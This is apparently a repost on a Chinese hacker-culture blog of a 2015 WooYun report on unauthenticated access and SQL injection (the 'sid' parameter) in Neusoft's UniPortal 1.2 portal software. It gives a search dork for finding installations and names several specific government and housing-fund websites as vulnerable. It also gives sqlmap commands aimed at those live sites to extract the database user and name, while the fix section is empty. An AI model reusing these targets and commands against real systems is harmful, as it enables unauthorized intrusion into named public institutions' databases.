记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

东软某通用门户软件系统存在通用型未授权访问到SQL注入漏洞

2015-03-16 01:35

东软通用门户软件 UniPortal 1.2 SQL注入漏洞

搜索引擎搜索: inurl:ecdomain

经测试发现,该系统存在未授权访问,且存在sql注入漏洞

未授权访问页面:ecdomain/portal/survey/admin/SurveyStatis.jsp

sql注入漏洞页面:/ecdomain/portal/survey/admin/SurveyStatisShow.jsp

SQL注入漏洞参数:sid

漏洞证明:

#1 未授权访问页面(直接给出链接)



http://www.hbsgjj.cn/ecdomain/portal/survey/admin/SurveyStatis.jsp

http://www.lnsxnh.com/ecdomain/portal/survey/admin/SurveyStatis.jsp

http://www.cyfcxx.com/ecdomain/portal/survey/admin/SurveyStatis.jsp

http://www.xysfq.com/ecdomain/portal/survey/admin/SurveyStatis.jsp

http://www.bjws.gov.cn/ecdomain/portal/survey/admin/SurveyStatis.jsp

http://services.ndrc.gov.cn:8080/ecdomain/portal/survey/admin/SurveyStatis.jsp

http://www.dggjj.cn/ecdomain/portal/survey/admin/SurveyStatis.jsp

http://www.tyzwzx.gov.cn/ecdomain/portal/survey/admin/SurveyStatis.jsp

……



#2 SQL注入漏洞证明



(1)http://www.tyzwzx.gov.cn/ecdomain/portal/survey/SurveyShow.jsp?sid=330fb2be13922e2630655c1

code 区域
C:\Users\Administrator>sqlmap.py -u "http://www.tyzwzx.gov.cn/ecdomain/portal/survey/admin/SurveyStatisShow.jsp?sid=699d61cd1338ca7da2c7934" --dbms=oracle --current-user



3.png





(2)http://www.bjws.gov.cn//ecdomain/portal/survey/admin/SurveyStatisShow.jsp?sid=699d61cd1338ca7da2c7934

code 区域
C:\Users\Administrator>sqlmap.py -u "http://www.bjws.gov.cn//ecdomain/portal/survey/admin/SurveyStatisShow.jsp?sid=699d61cd1338ca7da2c7934" --dbms=oracle --current-db



4.png





(3)http://www.hbsgjj.cn/ecdomain/portal/survey/SurveyShow.jsp?sid=18caa6d7141696e35d3538e

code 区域
C:\Users\Administrator>sqlmap.py -u "http://www.hbsgjj.cn/ecdomain/portal/survey/SurveyShow.jsp?sid=18caa6d7141696e35d3538e" --dbms=oracle --current-user



5.png





(4)http://www.lnsxnh.com/ecdomain/portal/survey/SurveyShow.jsp?sid=2e3635db1339f91518c7161

code 区域
C:\Users\Administrator>sqlmap.py -u "http://www.lnsxnh.com/ecdomain/portal/survey/SurveyShow.jsp?sid=2e3635db1339f91518c7161" --dbms=oracle --current-user



6.png





(5)http://www.xysfq.com/ecdomain/portal/survey/SurveyShow.jsp?sid=340d9efa133a4bc10497f27

code 区域
C:\Users\Administrator>sqlmap.py -u "http://www.xysfq.com/ecdomain/portal/survey/SurveyShow.jsp?sid=340d9efa133a4bc10497f27" --dbms=oracle --current-user



7.png





(6)http://www.dggjj.cn/ecdomain/portal/survey/SurveyShow.jsp?sid=2e3635db1339f91518c7161

code 区域
C:\Users\Administrator>sqlmap.py -u "http://www.dggjj.cn/ecdomain/portal/survey/SurveyShow.jsp?sid=2e3635db1339f91518c7161" --dbms=oracle --current-user



8.jpg



........

修复方案:

知识来源: www.wooyun.org/bugs/wooyun-2015-087293

阅读:268180 | 评论:0 | 标签:注入 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“东软某通用门户软件系统存在通用型未授权访问到SQL注入漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云